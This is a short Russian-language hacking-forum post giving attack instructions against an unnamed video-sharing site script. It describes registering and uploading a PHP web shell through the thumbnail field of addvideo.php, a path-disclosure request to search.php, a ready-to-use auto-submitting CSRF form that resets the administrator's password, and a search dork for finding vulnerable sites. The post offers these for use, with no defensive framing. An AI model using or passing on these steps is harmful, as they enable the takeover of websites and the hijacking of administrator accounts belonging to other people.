akatzuki
Сообщений: 80
Оценки: 0
Присоединился: 2009-05-06 12:20:56.626666
|
Заливка шелла без прав админа : Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его. После заливки он находится здесь : cайт/thumbs/имявашегошелла.php Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w Раскрытие путей : сайт/search.php?search[]=way&searchsubmit=
CSRF уязвимость <form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf">
<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
</form>
<script>
document.csrf.submit();
</script> Поисковой запрос inurl:search.php?order=views
(C) http://forum.kidal.org/showthread.php?t=152
|